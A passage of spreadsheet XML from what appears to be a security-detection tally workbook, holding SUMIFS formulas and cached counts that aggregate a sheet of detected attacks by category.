        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>14103</v>
      </c>
      <c r="Y37" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>5</v>
      </c>
      <c r="Z37" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>17893</v>
      </c>
      <c r="AA37" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>16</v>
      </c>
      <c r="AB37" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>34</v>
      </c>
      <c r="AC37" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>23</v>
      </c>
      <c r="AD37" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>136</v>
      </c>
      <c r="AE37" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>7</v>
      </c>
      <c r="AF37" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>574</v>
      </c>
      <c r="AG37" s="271"/>
      <c r="AH37" s="386" t="s">
        <v>2480</v>
      </c>
      <c r="AI37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>1296</v>
      </c>
      <c r="AJ37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>0</v>
      </c>
      <c r="AK37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>5</v>
      </c>
      <c r="AL37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>1253</v>
      </c>
      <c r="AN37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>103</v>
      </c>
      <c r="AR37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>2</v>
      </c>
      <c r="AS37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>1</v>
      </c>
      <c r="AU37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>3</v>
      </c>
      <c r="AV37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>4</v>
      </c>
      <c r="AW37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>12</v>
      </c>
      <c r="AY37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>1</v>
      </c>
      <c r="BA37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>14103</v>
      </c>
      <c r="BD37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>1</v>
      </c>
      <c r="BI37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>4</v>
      </c>
      <c r="BL37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>14784</v>
      </c>
      <c r="BN37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>3108</v>
      </c>
      <c r="BO37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>4</v>
      </c>
      <c r="BT37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>1</v>
      </c>
      <c r="BU37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>4</v>
      </c>
      <c r="BX37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>1</v>
      </c>
      <c r="BZ37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>0</v>
      </c>
      <c r="CA37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>1</v>
      </c>
      <c r="CC37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>2</v>
      </c>
      <c r="CG37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>6</v>
      </c>
      <c r="CL37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>15</v>
      </c>
      <c r="CN37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>3</v>
      </c>
      <c r="CP37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>18</v>
      </c>
      <c r="CQ37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>2</v>
      </c>
      <c r="CR37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>126</v>
      </c>
      <c r="CT37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>8</v>
      </c>
      <c r="CU37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>2</v>
      </c>
      <c r="CY37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>0</v>
      </c>
      <c r="CZ37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>5</v>
      </c>
      <c r="DE37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>2</v>
      </c>
      <c r="DF37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>450</v>
      </c>
      <c r="DI37" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>112</v>
      </c>
      <c r="DJ37" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>12</v>
      </c>
      <c r="DK37" s="271"/>
      <c r="DO37" s="357"/>
      <c r="DP37" s="358" t="s">
        <v>664</v>
      </c>
      <c r="DQ37" s="359">
        <v>1.0</v>
      </c>
      <c r="DR37" s="359">
        <v>1.0</v>
      </c>
      <c r="DS37" s="359">
        <v>3.0</v>
      </c>
      <c r="DT37" s="359">
        <v>3.0</v>
      </c>
      <c r="DU37" s="360">
        <v>5.0</v>
      </c>
      <c r="DV37" s="271"/>
      <c r="DW37" s="358" t="s">
        <v>664</v>
      </c>
      <c r="DX37" s="359">
        <v>1.0</v>
      </c>
      <c r="DY37" s="359">
        <v>1.0</v>
      </c>
      <c r="DZ37" s="359">
        <v>3.0</v>
      </c>
      <c r="EA37" s="359">
        <v>3.0</v>
      </c>
      <c r="EB37" s="360">
        <v>6.0</v>
      </c>
      <c r="EC37" s="271"/>
      <c r="ED37" s="280"/>
      <c r="EG37" s="279"/>
      <c r="EH37" s="271"/>
      <c r="EI37" s="358" t="s">
        <v>664</v>
      </c>
      <c r="EJ37" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI37,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S35 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="EK37" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BX$3:$BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI37,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!BX$3:BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI37 &amp; "*")</f>
        <v>20</v>
      </c>
      <c r="EL37" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI37,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI37 &amp; "*")</f>
        <v>30</v>
      </c>
      <c r="EM37" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI37,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI37 &amp; "*")</f>
        <v>65</v>
      </c>
      <c r="EN37" s="360">
        <f t="shared" si="4"/>
        <v>65</v>
      </c>
      <c r="EO37" s="364"/>
      <c r="EP37" s="364"/>
      <c r="EQ37" s="364"/>
      <c r="ER37" s="271"/>
      <c r="ES37" s="271"/>
      <c r="ET37" s="271"/>
      <c r="EU37" s="271"/>
      <c r="EV37" s="379" t="s">
        <v>664</v>
      </c>
      <c r="EW37" s="389">
        <f t="shared" si="8"/>
        <v>0.8333333333</v>
      </c>
      <c r="EX37" s="389">
        <f t="shared" si="9"/>
        <v>3.333333333</v>
      </c>
      <c r="EY37" s="389">
        <f t="shared" si="10"/>
        <v>5</v>
      </c>
      <c r="EZ37" s="390">
        <f t="shared" si="11"/>
        <v>10.83333333</v>
      </c>
      <c r="FA37" s="367"/>
      <c r="FK37" s="303" t="s">
        <v>310</v>
      </c>
      <c r="FL37" s="68">
